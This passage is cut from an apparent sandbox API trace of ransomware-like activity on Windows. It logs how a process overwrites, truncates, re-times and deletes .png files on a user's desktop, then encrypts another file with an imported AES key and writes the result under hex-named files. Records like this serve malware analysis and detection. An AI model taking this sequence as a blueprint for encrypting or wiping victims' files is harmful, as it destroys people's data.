lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.868] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.869] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.869] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.870] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.871] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.871] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x1c0ee5d8, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee5d8*=0x200, lpOverlapped=0x0) returned 1 [0070.871] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.872] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.873] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.873] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.874] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.875] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.876] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.876] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.877] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.878] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.879] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.879] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.880] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.881] WriteFile (in: hFile=0x398, lpBuffer=0x220dc68*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1c0ee608, lpOverlapped=0x0 | out: lpBuffer=0x220dc68*, lpNumberOfBytesWritten=0x1c0ee608*=0x1000, lpOverlapped=0x0) returned 1 [0070.882] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.883] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee638*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee638*=0) returned 0x0 [0070.884] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0070.884] SetEndOfFile (hFile=0x398) returned 1 [0070.885] SetFilePointer (in: hFile=0x398, lDistanceToMove=0, lpDistanceToMoveHigh=0x1c0ee648*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1c0ee648*=0) returned 0x0 [0070.885] CloseHandle (hObject=0x398) returned 1 [0070.885] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.885] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.886] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.886] GetFileType (hFile=0x398) returned 0x1 [0070.945] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.946] GetFileType (hFile=0x398) returned 0x1 [0070.946] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee6a8, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.946] CloseHandle (hObject=0x398) returned 1 [0070.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.946] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.946] GetFileType (hFile=0x398) returned 0x1 [0070.946] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.946] GetFileType (hFile=0x398) returned 0x1 [0070.946] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee6a8, lpLastWriteTime=0x0) returned 1 [0070.946] CloseHandle (hObject=0x398) returned 1 [0070.946] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0edf60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.947] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee440) returned 1 [0070.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.947] GetFileType (hFile=0x398) returned 0x1 [0070.947] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3b0) returned 1 [0070.947] GetFileType (hFile=0x398) returned 0x1 [0070.947] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee6a8) returned 1 [0070.947] CloseHandle (hObject=0x398) returned 1 [0070.947] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee160, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.947] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\otdkuc0245.png")) returned 1 [0070.948] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\OtDkuC0245.png", lpFilePart=0x0) returned 0x39 [0070.948] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", lpFilePart=0x0) returned 0x4b [0070.948] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.949] GetFileType (hFile=0x398) returned 0x1 [0070.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.949] GetFileType (hFile=0x398) returned 0x1 [0070.949] SetFileTime (hFile=0x398, lpCreationTime=0x1c0ee748, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0070.949] CloseHandle (hObject=0x398) returned 1 [0070.949] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", lpFilePart=0x0) returned 0x4b [0070.949] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.949] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.949] GetFileType (hFile=0x398) returned 0x1 [0070.949] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.949] GetFileType (hFile=0x398) returned 0x1 [0070.949] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x1c0ee748, lpLastWriteTime=0x0) returned 1 [0070.949] CloseHandle (hObject=0x398) returned 1 [0070.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", nBufferLength=0x105, lpBuffer=0x1c0ee000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6", lpFilePart=0x0) returned 0x4b [0070.950] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee4e0) returned 1 [0070.950] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\8E09CE7D63482F96CD93D3541F916DB6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\8e09ce7d63482f96cd93d3541f916db6"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.950] GetFileType (hFile=0x398) returned 0x1 [0070.950] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee450) returned 1 [0070.950] GetFileType (hFile=0x398) returned 0x1 [0070.950] SetFileTime (hFile=0x398, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1c0ee748) returned 1 [0070.950] CloseHandle (hObject=0x398) returned 1 [0070.950] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.951] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0ee230, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.951] CryptAcquireContextW (in: phProv=0x1c0ee598, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1c0ee598*=0x1a5b7810) returned 1 [0070.952] CryptImportKey (in: hProv=0x1a5b7810, pbData=0x222e7e8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee550 | out: phKey=0x1c0ee550*=0x1a626bb0) returned 1 [0070.952] CryptContextAddRef (hProv=0x1a5b7810, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.952] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1c0ee660 | out: pbData=0x0*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.952] CryptExportKey (in: hKey=0x1a626bb0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x222e8d8, pdwDataLen=0x1c0ee660 | out: pbData=0x222e8d8*, pdwDataLen=0x1c0ee660*=0x1c) returned 1 [0070.952] CryptImportKey (in: hProv=0x1a5b7810, pbData=0x222e9f8, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1c0ee520 | out: phKey=0x1c0ee520*=0x1a626a60) returned 1 [0070.952] CryptContextAddRef (hProv=0x1a5b7810, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.952] CryptContextAddRef (hProv=0x1a5b7810, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.952] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1c0ee510 | out: phKey=0x1c0ee510*=0x1a626d00) returned 1 [0070.952] CryptContextAddRef (hProv=0x1a5b7810, pdwReserved=0x0, dwFlags=0x0) returned 1 [0070.952] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x4, pbData=0x222eb40*=0x1, dwFlags=0x0) returned 1 [0070.953] CryptSetKeyParam (hKey=0x1a626d00, dwParam=0x1, pbData=0x222eaf0, dwFlags=0x0) returned 1 [0070.953] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0070.953] CryptReleaseContext (hProv=0x1a5b7810, dwFlags=0x0) returned 1 [0070.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png", lpFilePart=0x0) returned 0x34 [0070.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\_-VVa.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\_-vva.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.953] GetFileType (hFile=0x398) returned 0x1 [0070.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.953] GetFileType (hFile=0x398) returned 0x1 [0070.953] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", nBufferLength=0x105, lpBuffer=0x1c0edf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", lpFilePart=0x0) returned 0x4b [0070.953] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee460) returned 1 [0070.953] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x384 [0070.953] GetFileType (hFile=0x384) returned 0x1 [0070.953] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee3d0) returned 1 [0070.953] GetFileType (hFile=0x384) returned 0x1 [0070.954] ReadFile (in: hFile=0x398, lpBuffer=0x222eee8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x222eee8*, lpNumberOfBytesRead=0x1c0ee558*=0xa10c, lpOverlapped=0x0) returned 1 [0070.955] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2242f00*, pdwDataLen=0x1c0ee5b0*=0xa100, dwBufLen=0xa100 | out: pbData=0x2242f00*, pdwDataLen=0x1c0ee5b0*=0xa100) returned 1 [0070.955] WriteFile (in: hFile=0x384, lpBuffer=0x2242f00*, nNumberOfBytesToWrite=0xa100, lpNumberOfBytesWritten=0x1c0ee548, lpOverlapped=0x0 | out: lpBuffer=0x2242f00*, lpNumberOfBytesWritten=0x1c0ee548*=0xa100, lpOverlapped=0x0) returned 1 [0070.957] ReadFile (in: hFile=0x398, lpBuffer=0x222eee8, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1c0ee558, lpOverlapped=0x0 | out: lpBuffer=0x222eee8*, lpNumberOfBytesRead=0x1c0ee558*=0x0, lpOverlapped=0x0) returned 1 [0070.957] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x224d040*, pdwDataLen=0x1c0ee4f0*=0x10, dwBufLen=0x10 | out: pbData=0x224d040*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.957] CryptEncrypt (in: hKey=0x1a626d00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x224d090*, pdwDataLen=0x1c0ee4f0*=0x0, dwBufLen=0x10 | out: pbData=0x224d090*, pdwDataLen=0x1c0ee4f0*=0x10) returned 1 [0070.957] WriteFile (in: hFile=0x384, lpBuffer=0x224d0e0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1c0ee478, lpOverlapped=0x0 | out: lpBuffer=0x224d0e0*, lpNumberOfBytesWritten=0x1c0ee478*=0x10, lpOverlapped=0x0) returned 1 [0070.957] CloseHandle (hObject=0x384) returned 1 [0070.958] CloseHandle (hObject=0x398) returned 1 [0070.958] CryptDestroyKey (hKey=0x1a626bb0) returned 1 [0070.958] CryptReleaseContext (hProv=0x1a5b7810, dwFlags=0x0) returned 1 [0070.958] CryptReleaseContext (hProv=0x1a5b7810, dwFlags=0x0) returned 1 [0070.958] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", nBufferLength=0x105, lpBuffer=0x1c0edfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417", lpFilePart=0x0) returned 0x4b [0070.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee490) returned 1 [0070.959] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x398 [0070.959] GetFileType (hFile=0x398) returned 0x1 [0070.959] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1c0ee400) returned 1 [0070.959] GetFileType (hFile=0x398) returned 0x1 [0070.959] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.960] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.961] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.962] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.963] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.963] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.963] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.963] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.964] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.964] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x1000, lpOverlapped=0x0) returned 1 [0070.964] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x110, lpOverlapped=0x0) returned 1 [0070.964] ReadFile (in: hFile=0x398, lpBuffer=0x224e7d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1c0ee578, lpOverlapped=0x0 | out: lpBuffer=0x224e7d8*, lpNumberOfBytesRead=0x1c0ee578*=0x0, lpOverlapped=0x0) returned 1 [0070.964] CloseHandle (hObject=0x398) returned 1 [0070.967] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417.info", nBufferLength=0x105, lpBuffer=0x1c0edd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417.info", lpFilePart=0x0) returned 0x50 [0070.967] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1c0ee210) returned 1 [0070.967] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CKBy\\206F91A70C35E520ECB6EA932D330417.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ckby\\206f91a70c35e520ecb6ea932d330417.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 